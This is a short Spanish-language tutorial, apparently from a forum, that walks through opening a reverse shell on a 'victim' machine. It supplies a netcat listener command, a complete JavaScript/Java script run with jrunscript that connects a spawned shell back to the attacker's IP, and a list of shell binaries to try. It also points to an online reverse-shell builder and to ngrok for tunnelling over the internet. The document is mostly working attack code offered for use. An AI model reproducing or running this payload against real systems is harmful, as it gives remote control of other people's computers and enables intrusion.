paso a explicar los comandos mas importantes recuerda el atacante y la victima tienen que usar el mismo puerto y estar dentro de la misma red si quieres atraves de wan tienes que usar un tunel XD
1 primer paso preparando el listener en el atacante en el puerto 9001
Código
nc -lvnp 9001
2 modifica la primera linea del script para que use el ip del atacante y un puerto recuerda los puertos tienen que coincidir
Código
main( "localhost",9001,"cmd"); function main(host,port,cmd) { try { p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start(); s = new java.net.Socket(host, port); pi = p.getInputStream(); pe = p.getErrorStream(); si = s.getInputStream(); po = p.getOutputStream(); so = s.getOutputStream(); while (!s.isClosed()) { while (pi.available() > 0) so.write(pi.read()); while (pe.available() > 0) so.write(pe.read()); while (si.available() > 0) po.write(si.read()); so.flush(); po.flush(); java.lang.Thread.sleep(50); try { p.exitValue(); break; } catch ( e) {/*e.printStackTrace();*/} } p.destroy(); s.close(); } catch ( e) {e.printStackTrace();} }
3 ejecutar script shell.js en la victima usando el ip del atacante y cmd para los que odian al los pinwinos o
Código
jrunscript shell.js
otras opciones dependiendo de el sistema operativo y las configuraciones puede funcionar alguno
sh
/bin/sh
bash
/bin/bash
cmd
powershell
pwsh
ash
bsh
csh
ksh
zsh
pdksh
tcsh
fuentes y herramientas
un builder de shell reversa online https://www.revshells.com/
y con ngrok te haces un tunel